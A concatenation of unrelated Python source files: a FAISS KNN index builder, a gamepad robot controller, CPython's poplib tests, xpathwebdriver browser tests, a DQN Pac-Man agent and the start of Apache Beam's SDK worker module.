parser.add_argument(
'--output_file', type=str, required=True, help='Output KNN Map index file',
)
parser.add_argument(
'--devices', type=str, default=None, help='delimited list input with cuda devices. Specify like 0,1,2'
)
parser.add_argument(
"--batch_size", type=int, default=4000, help="Batch size for encoding. Use max according to GPU MEM"
)
group = parser.add_argument_group(title='tokenizer')
group.add_argument(
'--tokenizer-library',
type=str,
required=True,
choices=['yttm', 'sentencepiece', 'megatron', 'huggingface', 'tabular'],
help='What tokenizer library to use.',
)
group.add_argument(
'--tokenizer-type', type=str, default=None, help='What type of tokenizer to use.',
)
group.add_argument(
'--tokenizer-model', type=str, default=None, help='Path to tokenizer model.',
)
group.add_argument('--vocab-file', type=str, default=None, help='Path to the vocab file')
group.add_argument('--merge-file', type=str, default=None, help='Path to the BPE merge file (if necessary).')
group.add_argument('--delimiter', type=str, default=None, help='delimiter used for tabular tokenizer')
args = parser.parse_args()
model = SentenceTransformer(args.sentence_transformer_model)
tokenizer = get_tokenizer(args)
ds = MMapRetrievalIndexedDataset(args.input_file)
index = faiss.read_index(args.faiss_index)
process = multiprocessing.Process(target=process_sentence_chunks, args=(ds, tokenizer, args.process_chunk_size))
process.start()
if args.devices is None:
device_list = None
else:
device_list = ['cuda:' + str(device) for device in args.devices.split(',')]
pool = model.start_multi_process_pool(device_list)
emb_process = multiprocessing.Process(target=calculate_embedding, args=(pool, args.batch_size))
emb_process.start()
if ds._index.retrieval_db and args.remove_duplicate:
neighbors = args.K_neighbors + args.dedup_margin
# build the id maps for quick dedup
id_start = np.array(ds._index._chunk_id_start)
chunk_id_to_doc_id_map = np.zeros((ds.chunks,), dtype=np.int64)
build_map(id_start, chunk_id_to_doc_id_map, ds.chunks)
else:
neighbors = args.K_neighbors
chunk_id_start = 0
with KNNIndex.writer(args.output_file, args.K_neighbors) as w:
while True:
emb = get_emb()
if emb is None:
break
D, I = index.search(emb, neighbors)
if ds._index.retrieval_db and args.remove_duplicate:
tmp_neighbors = np.ones_like(I) * -1
dedup(chunk_id_to_doc_id_map, I, tmp_neighbors, chunk_id_start)
I = tmp_neighbors[:, : args.K_neighbors]
chunk_id_start += len(I)
w.write(I)
process.join()
emb_process.join()
model.stop_multi_process_pool(pool)
|
gamepad_reader.py
|
from absl import app
from absl import flags
from inputs import get_gamepad
import threading
import time
FLAGS = flags.FLAGS
MAX_ABS_RX = 32768
MAX_ABS_RY = 32768
def _interpolate(raw_reading, max_raw_reading, new_scale):
return raw_reading / max_raw_reading * new_scale
class Gamepad:
"""Interface for reading commands from Logitech F710 Gamepad.
The control works as following:
1) Press LB+RB at any time for emergency stop
2) Use the left joystick for forward/backward/left/right walking.
3) Use the right joystick for rotation around the z-axis.
"""
def __init__(self, vel_scale_x=.4, vel_scale_y=.4, vel_scale_rot=1.):
"""Initialize the gamepad controller.
Args:
vel_scale_x: maximum absolute x-velocity command.
vel_scale_y: maximum absolute y-velocity command.
vel_scale_rot: maximum absolute yaw-dot command.
"""
self._vel_scale_x = vel_scale_x
self._vel_scale_y = vel_scale_y
self._vel_scale_rot = vel_scale_rot
self._lb_pressed = False
self._rb_pressed = False
# Controller states
self.vx, self.vy, self.wz = 0., 0., 0.
self.estop_flagged = False
self.is_running = True
self.read_thread = threading.Thread(target=self.read_loop)
self.read_thread.start()
def read_loop(self):
"""The read loop for events.
This funnction should be executed in a separate thread for continuous
event recording.
"""
while self.is_running and not self.estop_flagged:
events = get_gamepad()
for event in events:
self.update_command(event)
def update_command(self, event):
"""Update command based on event readings."""
if event.ev_type == 'Key' and event.code == 'BTN_TL':
self._lb_pressed = bool(event.state)
elif event.ev_type == 'Key' and event.code == 'BTN_TR':
self._rb_pressed = bool(event.state)
elif event.ev_type == 'Absolute' and event.code == 'ABS_X':
# Left Joystick L/R axis
self.vy = _interpolate(-event.state, MAX_ABS_RX, self._vel_scale_y)
elif event.ev_type == 'Absolute' and event.code == 'ABS_Y':
# Left Joystick F/B axis; need to flip sign for consistency
self.vx = _interpolate(-event.state, MAX_ABS_RY, self._vel_scale_x)
elif event.ev_type == 'Absolute' and event.code == 'ABS_RX':
self.wz = _interpolate(-event.state, MAX_ABS_RX, self._vel_scale_rot)
if self._lb_pressed and self._rb_pressed:
self.estop_flagged = True
self.vx, self.vy, self.wz = 0., 0., 0.
def get_command(self, time_since_reset):
del time_since_reset # unused
return (self.vx, self.vy, 0), self.wz, self.estop_flagged
def stop(self):
self.is_running = False
def main(_):
gamepad = Gamepad()
while True:
print("Vx: {}, Vy: {}, Wz: {}, Estop: {}".format(gamepad.vx, gamepad.vy,
gamepad.wz,
gamepad.estop_flagged))
time.sleep(0.1)
if __name__ == "__main__":
app.run(main)
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import time
import errno
from unittest import TestCase
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' %(arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestPOP3Class(TestCase):
def assertOK(self, resp):
self.assertTrue(resp.startswith(b"+OK"))
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.start()
self.client = poplib.POP3(self.server.host, self.server.port)
def tearDown(self):
self.client.quit()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(),
b'+OK dummy pop3 server ready. <timestamp>')
def test_exceptions(self):
self.assertRaises(poplib.error_proto, self.client._shortcmd, 'echo -err')
def test_user(self):
self.assertOK(self.client.user('guido'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_pass_(self):
self.assertOK(self.client.pass_('python'))
self.assertRaises(poplib.error_proto, self.client.user, 'invalid')
def test_stat(self):
self.assertEqual(self.client.stat(), (10, 100))
def test_list(self):
self.assertEqual(self.client.list()[1:],
([b'1 1', b'2 2', b'3 3', b'4 4', b'5 5'],
25))
self.assertTrue(self.client.list('1').endswith(b"OK 1 1"))
def test_retr(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy',
b'', b'line1', b'line2', b'line3'],
113)
foo = self.client.retr('foo')
self.assertEqual(foo, expected)
def test_dele(self):
self.assertOK(self.client.dele('foo'))
def test_noop(self):
self.assertOK(self.client.noop())
def test_rpop(self):
self.assertOK(self.client.rpop('foo'))
def test_apop(self):
self.assertOK(self.client.apop('foo', 'dummypassword'))
def test_top(self):
expected = (b'+OK 116 bytes',
[b'From: postmaster@python.org', b'Content-Type: text/plain',
b'MIME-Version: 1.0', b'Subject: Dummy', b'',
b'line1', b'line2', b'line3'],
113)
self.assertEqual(self.client.top(1, 1), expected)
def test_uidl(self):
self.client.uidl()
self.client.uidl('foo')
SUPPORTS_SSL = False
if hasattr(poplib, 'POP3_SSL'):
import ssl
SUPPORTS_SSL = True
CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert.pem")
class DummyPOP3_SSLHandler(DummyPOP3Handler):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
ssl_socket = ssl.wrap_socket(self.socket, certfile=CERTFILE,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(ssl_socket)
# Must try handshake before calling push()
self._ssl_accepting = True
self._do_ssl_handshake()
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
DummyPOP3Handler.handle_read(self)
class TestPOP3_SSLClass(TestPOP3Class):
# repeat previous tests by using poplib.POP3_SSL
def setUp(self):
self.server = DummyPOP3Server((HOST, PORT))
self.server.handler = DummyPOP3_SSLHandler
self.server.start()
self.client = poplib.POP3_SSL(self.server.host, self.server.port)
def test__all__(self):
self.assertIn('POP3_SSL', poplib.__all__)
def test_context(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, certfile=CERTFILE, context=ctx)
self.assertRaises(ValueError, poplib.POP3_SSL, self.server.host,
self.server.port, keyfile=CERTFILE,
certfile=CERTFILE, context=ctx)
self.client.quit()
self.client = poplib.POP3_SSL(self.server.host, self.server.port,
context=ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.assertIs(self.client.sock.context, ctx)
self.assertTrue(self.client.noop().startswith(b'+OK'))
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(60) # Safety net. Look issue 11812
self.port = test_support.bind_port(self.sock)
self.thread = threading.Thread(target=self.server, args=(self.evt,self.sock))
self.thread.setDaemon(True)
self.thread.start()
self.evt.wait()
def tearDown(self):
self.thread.join()
del self.thread # Clear out any dangling Thread objects.
def server(self, evt, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
conn.send(b"+ Hola mundo\n")
conn.close()
except socket.timeout:
pass
finally:
serv.close()
def testTimeoutDefault(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def testTimeoutNone(self):
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
pop = poplib.POP3(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(pop.sock.gettimeout() is None)
pop.sock.close()
def testTimeoutValue(self):
pop = poplib.POP3(HOST, self.port, timeout=30)
self.assertEqual(pop.sock.gettimeout(), 30)
pop.sock.close()
def test_main():
tests = [TestPOP3Class, TestTimeouts]
if SUPPORTS_SSL:
tests.append(TestPOP3_SSLClass)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
test_XpathBrowser.py
|
# -*- coding: utf-8 -*-
'''
xpathwebdriver
Copyright (c) 2015 Juju. Inc
Code Licensed under MIT License. See LICENSE file.
'''
import unittest
import threading
from contextlib import contextmanager
import bottle
from selenium.webdriver.remote.webdriver import WebDriver
from xpathwebdriver.browser import Browser
from xpathwebdriver.default_settings import DefaultSettings
from xpathwebdriver.solve_settings import register_settings_instance,\
solve_settings
class WebUnitTestBase(unittest.TestCase):
port = 8080
host = 'localhost'
@classmethod
def _path_to_url(cls, path):
return f'http://{cls.host}:{cls.port}/{path}'
@classmethod
def get_local_page(cls, path):
cls.browser.get_url(cls._path_to_url(path))
@contextmanager
def create_html(self, name, body, **kwargs):
try:
self.push_page(name, body, **kwargs)
yield name
except:
raise
finally:
self.pop_page(name)
def push_page(self, name, body, **kwargs):
templ = '''
<!DOCTYPE html>
<html>
<head>
{jquery}
<title>{name}</title>
</head>
<body>
{body}
</body>
</html>
'''
jquery = ''
tmpl_vars = locals().copy()
tmpl_vars.update(kwargs)
self._pages_cache[name] = templ.format(**tmpl_vars)
def pop_page(self, name):
return self._pages_cache.pop(name)
@classmethod
def setUpClass(cls):
class Settings(DefaultSettings):
xpathbrowser_sleep_multiplier = 0.1
xpathbrowser_sleep_default_time = 0.1
register_settings_instance(Settings())
cls.browser = Browser(settings=solve_settings())
cls._pages_cache = {}
cls.setup_http_server()
@classmethod
def setup_http_server(cls):
class MyServer(bottle.WSGIRefServer):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
srv = make_server(self.host, self.port, app, server_cls, handler_cls)
### save tcp server so we can shut it down later
cls._tcp_server = srv
srv.serve_forever()
@bottle.route('/<name>')
def index(name):
if name == 'kill':
raise SystemExit()
if name in cls._pages_cache:
return bottle.template(cls._pages_cache[name])
return None
kwargs = dict(server=MyServer, host=cls.host, port=cls.port)
thread = threading.Thread(target=bottle.run, kwargs=kwargs)
thread.start()
cls._server_thread = thread
@classmethod
def tearDownClass(cls):
del cls.browser
cls._tcp_server.shutdown()
class TestXpathBrowser(WebUnitTestBase):
'''
TODO:
- get_url (with condition)
- get_path (with condition)
'''
def test_fill(self):
body = '''
<form>
First name:<br>
<input id=1 type="text" name="firstname">
<br>
Last name:<br>
<input id=2 type="text" name="lastname">
</form>
'''
self.browser.set_base_url('http://mepinta.com/')
self.assertEqual(self.browser.build_url('example'), 'http://mepinta.com/example')
with self.create_html('test_fill', body) as path:
self.get_local_page(path)
self.assertTrue(self.browser.current_path.endswith('test_fill'))
self.assertTrue(self.browser.current_url.endswith('test_fill'))
self.assertIsInstance(self.browser.get_driver(), WebDriver)
self.browser.fill_form(firstname='John1', lastname='Doe1')
self.browser.fill_form_attr('id', {1:'John2', 2:'Doe2'})
self.browser.fill_form_ordered([('firstname','John3'), ('lastname','Doe3')])
self.browser.fill_form_xpath({'//form/input[1]':'John4','//form/input[2]':'Doe4'})
def test_click(self):
body = "<button id='example_button'>Example</button>"
with self.create_html('test_click', body) as path:
self.get_local_page(path)
self.browser.click('.//button')
self.browser.click(".//*[@id='example_button']")
def test_sleep(self):
self.browser.sleep()
self.browser.sleep(0.1)
self.browser.sleep(0.1, condition='>')
self.browser.sleep(condition='<')
self.browser.sleep(0.05, condition='=')
self.browser.sleep(1, condition='><')
def test_select(self):
body = '''
<div>
<div id='some_text'>
<p>The quick fox jumped over the Lorem Ipsum.</p>
</div>
<div id='some_other'>
<p>The other quick fox jumped over the Lorem Ipsum.</p>
</div>
</div>
'''
with self.create_html('test_select', body) as path:
self.get_local_page(path)
self.assertTrue(self.browser.select_xpath('//div'))
self.assertTrue(self.browser.select_xsingle('//div'))
found = self.browser.wait_condition(lambda b: b.select_xpath('//div'))
self.assertTrue(found)
found = self.browser.wait_condition(lambda b: b.select_xpath('//div/form'), max_wait=0.1)
self.assertFalse(found)
# default condition
found = self.browser.wait_condition()
self.assertTrue(found)
def test_window(self):
body = "<h1>Example</h1>"
with self.create_html('test_target_window', body) as target:
body = f"<a href='{self._path_to_url(target)}' target='blank'>Example</a>"
with self.create_html('test_window', body) as path:
self.get_local_page(path)
self.browser.click('.//a')
with self.browser.window():
self.assertTrue(self.browser.xpath('//h1/text()'))
if __name__ == "__main__":
unittest.main()
|
agent.py
|
import threading
import settings as s
from collections import namedtuple, deque
from api.actions import Actions
from analytics_frame import Analytics
from api.agent_analytics_frame import AgentAnalyticsFrameAPI
import random
import math
import copy
from sklearn.preprocessing import MinMaxScaler
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
DEVICE = torch.device("cpu") # use CPU rather than Cuda GPU to power agent
EXPERIENCE = namedtuple("Experience",
field_names=["state", "action", "reward", "next_state"])
GAMMA = 0.999
is_calc_grad = False
class LearnerAgent(AgentAnalyticsFrameAPI):
agent_instance = None
@staticmethod
def create_agent_instance(game_inst):
if LearnerAgent.agent_instance is None:
LearnerAgent.agent_instance = LearnerAgent(game_inst, EpsilonGreedyStrategy(s.EPSILON_START, s.EPSILON_END, s.EPSILON_DECAY))
@staticmethod
def run_decision():
thread = threading.Thread(target=LearnerAgent.agent_instance.decide)
thread.start()
@staticmethod
def reset():
LearnerAgent.agent_instance.reset_agent()
def __init__(self, pacman_inst, learning_strat):
self.api = pacman_inst
self.learning_strat = learning_strat
self.learning_rate = None
self.policy_net = Network(pacman_inst)
self.target_net = Network(pacman_inst)
self.target_net.load_state_dict(self.policy_net.state_dict())
self.target_net.eval()
self.memory = ReplayMemory(s.REPLAY_MEMORY_SIZE)
self.current_state = self.get_game_vals(True)
self.prev_decision = None
self.ghost_list = []
self.pellet_tuple = ()
self.power_tuple = ()
self.power_active = False
self.decision = None
self.decision_type = ""
self.decision_count = 0
def reset_agent(self):
self.policy_net = Network(self.api)
self.target_net = Network(self.api)
self.target_net.load_state_dict(self.policy_net.state_dict())
self.target_net.eval()
self.learning_rate = None
self.memory = ReplayMemory(s.REPLAY_MEMORY_SIZE)
self.current_state = self.get_game_vals(True)
self.prev_decision = None
self.ghost_list = []
self.pellet_tuple = ()
self.power_tuple = ()
self.power_active = False
self.decision = None
self.decision_type = ""
self.decision_count = 0
def decide(self):
state = self.get_game_vals(True)
rate = self.learning_strat.get_rate()
decision = None
if random.random() > rate:
with torch.no_grad():
output = self.policy_net(state).tolist()
best_decision = (Actions.UP, -1000000)
for action in self.api.getAvailableActions(None):
if output[action.value] > best_decision[1]:
best_decision = (action, output[action.value])
decision = best_decision[0]
self.decision_type = "EXPLOITATION"
#print("Calculated decision: " + str(decision))
else:
decision = random.choice(self.api.getAvailableActions(self.prev_decision))
self.decision_type = "EXPLORATION"
#print("Random decision: " + str(decision))
self.choose_action(decision)
self.prev_decision = decision
self.memory.add(self.current_state.unsqueeze(0), torch.tensor([[decision.value]]),
torch.tensor([[self.api.getReward()]]), state.unsqueeze(0))
if self.memory.can_provide_sample(s.REPLAY_BATCH_SIZE) and safe_batch():
torch.autograd.set_detect_anomaly(True)
toggle_safe_batch()
transitions = self.memory.sample(s.REPLAY_BATCH_SIZE)
batch = EXPERIENCE(*zip(*transitions))
non_final_mask = torch.tensor(tuple(map(lambda s: s is not None,
batch.next_state)), device=DEVICE, dtype=torch.bool)
non_final_next_states = torch.cat([s for s in batch.next_state
if s is not None])
state_batch = torch.cat(batch.state).clone()
action_batch = torch.cat(batch.action).clone()
reward_batch = torch.cat(batch.reward).clone()
state_action_values = self.policy_net(state_batch).gather(1, action_batch).clone() #this line fails to compute gradient
next_state_values = torch.zeros(s.REPLAY_BATCH_SIZE, device=DEVICE)
next_state_values[non_final_mask] = self.target_net(non_final_next_states).max(1)[0].detach().clone()
expected_state_action_values = next_state_values * GAMMA
for i in range(s.REPLAY_BATCH_SIZE):
expected_state_action_values[i] = expected_state_action_values[i] + reward_batch[i][0]
expected_state_action_values = expected_state_action_values.unsqueeze(1)
loss = F.smooth_l1_loss(state_action_values.clone(), expected_state_action_values).clone()
optimizer = optim.RMSprop(self.policy_net.parameters(),
lr=self.init_learning_rate() if self.learning_rate is None else self.learning_rate)
optimizer.zero_grad()
loss.backward() # BUG: this fails after a few runs
for param in self.policy_net.parameters():
param.grad.data.clamp_(-1, 1)
optimizer.step()
toggle_safe_batch()
self.current_state = state
def choose_action(self, decision):
if decision is Actions.UP:
self.decision = "UP"
self.api.moveUp()
elif decision is Actions.DOWN:
self.decision = "DOWN"
self.api.moveDown()
elif decision is Actions.LEFT:
self.decision = "LEFT"
self.api.moveLeft()
elif decision is Actions.RIGHT:
self.decision = "RIGHT"
self.api.moveRight()
self.decision_count += 1
def get_game_vals(self, normalize):
ghost_list = self.api.getGhostsGridCoords()
pellet_tuple = self.api.getNearestPelletGridCoords()
power_tuple = self.api.getNearestPowerPelletGridCoords()
power_active = self.api.isPowerPelletActive()
values = [ghost_list[0][0], ghost_list[0][1], ghost_list[1][0], ghost_list[1][1], ghost_list[2][0],
ghost_list[2][1], ghost_list[3][0], ghost_list[3][1], pellet_tuple[0], pellet_tuple[1],
power_tuple[0], power_tuple[1], s.GRID_H if power_active else -s.GRID_H]
value_length = len(values)
if normalize:
values.append(-s.GRID_H)
values.append(s.GRID_H)
values = MinMaxScaler(feature_range=(-1, 1)).fit_transform(np.array(values).reshape(-1, 1)).reshape(len(values),).tolist()
tensor = torch.Tensor(values[:value_length])
self.ghost_list = ghost_list
self.pellet_tuple = pellet_tuple
self.power_tuple = power_tuple
self.power_active = power_active
return tensor
def init_learning_rate(self):
self.learning_rate = Analytics.analytics_instance.learning_rate
return self.learning_rate
# -- -- -- AGENT API FUNCTIONS -- -- -- #
def get_network_structure(self):
return [13, 10, 10, 8, 4]
def get_activation_vals(self, layer_index):
try:
return self.policy_net.full_node_dist[layer_index]
except IndexError:
return None
def get_weights(self, layer_index):
try:
return next((weights[1] for weights in self.policy_net.full_weight_dist if weights[0] == layer_index), None)
# return self.policy_net.full_weight_dist[layer_index]
except IndexError:
return None
def get_logic_count(self):
return self.decision_count
def get_ghost_coords(self):
return self.ghost_list
def get_nearest_pellet_coords(self):
return self.pellet_tuple
def get_nearest_power_pellet_coords(self):
return self.power_tuple
def get_power_pellet_active_status(self):
return self.power_active
def get_decision(self):
return self.decision, self.decision_type
def set_learning_rate(self, learning_rate):
pass
def set_target_score(self, target_score):
self.api.setTarHighScore(target_score)
def set_game_start_pos(self, pos_dict, centered_start):
self.api.set_start_pos(pos_dict, centered_start)
def stop_sim(self):
pass
def start_sim(self):
self.api.gameStart()
def safe_batch():
return not is_calc_grad
def toggle_safe_batch():
global is_calc_grad
is_calc_grad = not is_calc_grad
class Network(nn.Module):
def __init__(self, pacmanInst):
super(Network, self).__init__()
self.input = nn.Linear(13, 10)
self.h1 = nn.Linear(10, 10)
self.h2 = nn.Linear(10, 8)
self.output = nn.Linear(8, 4)
self.squishifier = nn.Tanh()
self.api = pacmanInst
self.full_node_dist = []
self.full_weight_dist = []
def forward(self, x):
input_is_batch = isinstance(x.tolist()[0], list)
node_dist = [self.squishifier(x).tolist()]
weight_dist = []
for index, layer in [(0, self.input), (1, self.h1), (2, self.h2), (3, self.output)]:
x = layer(x)
x = self.squishifier(x)
if not input_is_batch:
node_dist.append(x.tolist())
weight_dist.append((index, layer.weight.tolist()))
if not input_is_batch:
self.full_node_dist = node_dist
self.full_weight_dist = weight_dist
return x
class ReplayMemory:
def __init__(self, capacity):
self.capacity = capacity
self.memory = deque(maxlen=capacity)
self.push_count = 0
def add(self,state, action, reward, next_state):
if len(self.memory) >= self.capacity:
self.memory[self.push_count % self.capacity] = EXPERIENCE(state,action,reward,next_state)
else:
self.memory.append(EXPERIENCE(state,action,reward,next_state))
self.push_count += 1
def sample(self, batch_size):
sampled_exp = random.sample(self.memory, batch_size)
return sampled_exp
def can_provide_sample(self, batch_size):
return len(self.memory) >= batch_size
def __len__(self):
return len(self.memory)
class EpsilonGreedyStrategy:
def __init__(self, start, end, decay):
self.start = start
self.end = end
self.decay = decay
self.step_count = 0
self.threshold = 0
def get_rate(self):
self.threshold = self.end + (self.start - self.end) * math.exp(-1 * self.step_count / self.decay)
self.step_count += 1
return self.threshold
|
sdk_worker.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""SDK harness for executing Python Fns via the Fn API."""
# pytype: skip-file
# mypy: disallow-untyped-defs
import abc
import collections
import contextlib
import functools
import logging
import queue
import sys
import threading
import time
import traceback
from concurrent import futures
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import FrozenSet
from typing import Generic
from typing import Iterable
from typing import Iterator
from typing import List
from typing import MutableMapping
from typing import Optional
from typing import Tuple
from typing import TypeVar
from typing import Union
import grpc
from apache_beam.coders import coder_impl
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import metrics_pb2
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import statesampler
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.data_plane import PeriodicThread
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
from apache_beam.runners.worker.worker_status import FnApiWorkerStatusHandler
from apache_beam.utils import thread_pool_executor
from apache_beam.utils.sentinel import Sentinel
if TYPE_CHECKING:
from apache_beam.portability.api import endpoints_pb2
from apache_beam.utils.profiler import Profile
T = TypeVar('T')
_KT = TypeVar('_KT')
_VT = TypeVar('_VT')
_LOGGER = logging.getLogger(__name__)
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S = 60
# The number of ProcessBundleRequest instruction ids the BundleProcessorCache
# will remember for not running instructions.
MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS = 1000
# The number of ProcessBundleRequest instruction ids that BundleProcessorCache
# will remember for failed instructions.
MAX_FAILED_INSTRUCTIONS = 10000
class ShortIdCache(object):
""" Cache for MonitoringInfo "short ids"
"""
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._last_short_id = 0
self._info_key_to_short_id = {} # type: Dict[FrozenSet, str]
self._short_id_to_info = {} # type: Dict[str, metrics_pb2.MonitoringInfo]
def get_short_id(self, monitoring_info):
# type: (metrics_pb2.MonitoringInfo) -> str
""" Returns the assigned shortId for a given MonitoringInfo, assigns one if
not assigned already.
"""
key = monitoring_infos.to_key(monitoring_info)
with self._lock:
try:
return self._info_key_to_short_id[key]
except KeyError:
self._last_short_id += 1
# Convert to a hex string (and drop the '0x') for some compression
shortId = hex(self._last_short_id)[2:]
payload_cleared = metrics_pb2.MonitoringInfo()
payload_cleared.CopyFrom(monitoring_info)
payload_cleared.ClearField('payload')
self._info_key_to_short_id[key] = shortId
self._short_id_to_info[shortId] = payload_cleared
return shortId
def get_infos(self, short_ids):
#type: (Iterable[str]) -> Dict[str, metrics_pb2.MonitoringInfo]
""" Gets the base MonitoringInfo (with payload cleared) for each short ID.
Throws KeyError if an unassigned short ID is encountered.
"""
return {
short_id: self._short_id_to_info[short_id]
for short_id in short_ids
}
SHORT_ID_CACHE = ShortIdCache()
class SdkHarness(object):
REQUEST_METHOD_PREFIX = '_request_'
def __init__(
self,
control_address, # type: str
credentials=None, # type: Optional[grpc.ChannelCredentials]
worker_id=None, # type: Optional[str]
# Caching is disabled by default
state_cache_size=0, # type: int
